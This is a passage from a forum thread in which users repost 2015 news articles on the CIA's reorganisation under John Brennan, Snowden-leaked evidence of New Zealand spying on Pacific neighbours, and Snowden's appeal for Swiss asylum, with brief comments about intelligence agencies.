"Brennan is trying to integrate the CIA's dissimilar tribes to replicate the manhunting success" after 2001, Allen said.

He said the attempt to break down barriers between analysts and operators, two deeply entrenched cultures, wouldn't be easy.

"This will take years and bureaucratic blood on the floor to blend these cultures," he said.

Brennan said that when he joined the CIA in 1980, headquarters kept a separate cafeteria for undercover officers to shield their identities from rank-and-file employees. Field operatives sometimes mocked analysts for sitting at a desk, and analysts worried that knowing too much about espionage could bias their interpretation of information.

That culture has changed over the last decade, but not enough, Brennan said.

He said the head of each mission center would draw personnel from the five directorates to follow urgent threats and fill information gaps. The centers will be organized by region, such as Africa or East Asia, or by type of threat, such as terrorism or illicit weapons proliferation.

Brennan said that the CIA had been "going all out" since 2001 but that he decided to "take a step back" to look at possible improvements after President Obama appointed him to head the agency in 2013.

Last September, Brennan appointed nine senior intelligence officials to see whether CIA organizational structure and policies should change. After three months, which included a poll of the CIA workforce, the team made recommendations that formed the basis of what Brennan decided to do.


Some are largely symbolic. The National Clandestine Service will revert to
the name it used for six
decades until 2005, the Directorate of Operations, a moniker familiar to fans of Cold War thrillers. The directorate of intelligence post will be renamed directorate of analysis to better reflect its duties.

The agency is also revamping how it teaches spycraft. Instead of each directorate running its own schools, training programs will be brought together under a chancellor at a facility Brennan called "CIA University."

The changes will be rolled out over the next several months, Brennan said. "None of this can be done at the flip of a light switch," he said.

brian.bennett@latimes.com

[Glaucon]

I found a better way

Just invite them in... it will catch them off guard

Exactly

I send the FBI emails all the time. When the Civil Liberties and privacy office of the NSA disseminates something, I mark the thing up with tons of comments and email it back to them 
Don't forget the NSA is a foreign intelligence agency. If you're paranoid, be paranoid of the FBI.

[zorgon]

Just an FYI  when we were checking IP addresses for spam for new members one account was the US NAVY Cyber Spook office in Quantico

Not sure if it is still here after we deleted the zero post members because I forgot which one it was. I think I posted it in Mod chat though 

Google searches:

Navy cyber crime unit

Army cyber crime unit

[space otter]

   

         

[space otter]

gonna be interesting to see if anyone takes him  - in his attempt to leave russia



Snowden Documents: New Zealand Spying On Pacific Neighbors And Indonesia



Reuters 
   Posted:  03/04/2015 8:31 pm EST    Updated:  03/05/2015 1:59 pm EST

vid at link


WELLINGTON, March 5 (Reuters) - New Zealand has been spying electronically on its Pacific Island neighbors and Indonesia and sharing the intelligence with its international allies, according to documents released on Thursday.

The documents, released by former U.S. National Security Authority contractor Edward Snowden and dating back to 2009, said New Zealand's electronic spy agency had intercepted emails, mobile and fixed line phone calls, social media messages and other communications in small Pacific states including Fiji, Samoa, Solomon Islands, and French Polynesia.

The material gathered by the Government Communications Security Bureau (GCSB) was shared with the U.S. National Security Agency (NSA), which along with agencies in Australia, Britain, and Canada, make up the "Five Eyes" surveillance network.

"They've gone from some selected targeting of the South Pacific states and other targets to a new stage of where they just hoover up everything," investigative writer Nicky Hager said on Radio New Zealand.

"They take every single phone call, every single email, and they go straight off into databases, which are U.S. National Security Agency databases."

Hager, who is collaborating with the New Zealand Herald newspaper and Intercept website in revealing the documents, said there would be further disclosures.

The documents also said a New Zealand GCSB officer had worked with the Australian Signals Directorate in spying on Indonesian cellphone company Telkomsel.

Prime Minister John Key refused to comment on the disclosures, but had said on Wednesday when asked about their expected release that they were bound to be wrong. The GCSB also refused comment.

The role of the agency, which has a large eavesdropping facility at the top of the country's South Island, was an issue in last year's general election, with documents released by Snowden suggesting the GCSB was planning to conduct mass domestic surveillance.

The GCSB is banned from spying on New Zealand citizens, unless authorized to support other agencies, but has no legal restrictions on foreign activities.

The South Pacific region has seen military coups in Fiji, inter-communal armed strife in the Solomon Islands, while France maintains military bases in Tahiti and New Caledonia.

China has also been increasing its influence and development aid to small island states.

(Reporting by Gyles Beckford; Editing by Michael Perry)

http://www.huffingtonpost.com/2015/03/04/snowden-new-zealand-spying_n_6804742.html?cps=gravity_1598_-1460152385019099665

[space otter]

Edward Snowden Wants Switzerland To Grant Him Asylum

Reuters 
   Posted:  03/06/2015 9:56 am EST    Updated:  03/06/2015 11:59 am EST

By Stephanie Nebehay

GENEVA, March 6 (Reuters) - Edward Snowden has made a public appeal for Switzerland to grant him asylum, saying he would like to return to live in Geneva, where he once worked undercover for the Central Intelligence Agency.

The fugitive former U.S. spy agency contractor, wanted by Washington for leaking details of U.S. mass surveillance programs, spoke from Moscow by video link to a Geneva audience after a viewing of "Citizenfour," an Oscar-winning documentary about his case.

"I would love to return to Switzerland, some of my favorite memories are from Geneva. It's a wonderful place," he told the International Film Festival and Forum on Human Rights on Thursday night, where he was asked about seeking asylum.

"I do think Switzerland would be a sort of great political option because it has a history of neutrality," he said, praising its multicultural diversity and human rights record.

Snowden said he had appealed to 21 countries, "the majority in central and Western Europe," for asylum after the United States canceled his passport and he was stopped from going to Ecuador.

"Unfortunately no country said yes," he said, blaming "political interference" by the Obama administration.

Snowden was accredited to the U.S. diplomatic mission in Geneva from March 2007 to February 2009, tapping communications systems.

"Switzerland still has an active U.S. espionage presence, I think that is true of other countries as well ... espionage is illegal in Switzerland," he said.

Snowden, 31, reiterated that he would not return to the United States unless offered a "fair trial."

"I am working very hard with my lawyers to try to get reliable guarantees of a fair trial. Unfortunately the Department of Justice is unwilling to agree in that regard.

"The only thing they have said at this point is that they would not execute me, which is not the same as a fair trial."

Sherif Elsayed-Ali of Amnesty International said in a debate after the film by Laura Poitras that Snowden deserved asylum.

"Edward Snowden is without a doubt a whistleblower and someone who should be protected. He should not even be tried, because what he did was to expose government over-reach and things that should not be happening."

Under current Swiss laws, an applicant has to be on Swiss territory to lodge an asylum request.

Snowden currently has asylum in Russia.

Historian Hubertus Knabe said in the debate: "It's so tragic that he got asylum where democracy does not exist and the secret police has such an important role that the former head of it is now president." (Reporting by Stephanie Nebehay; editing by Andrew Roche)



http://www.huffingtonpost.com/2015/03/06/edward-snowden-switzerland-asylum_n_6816302.html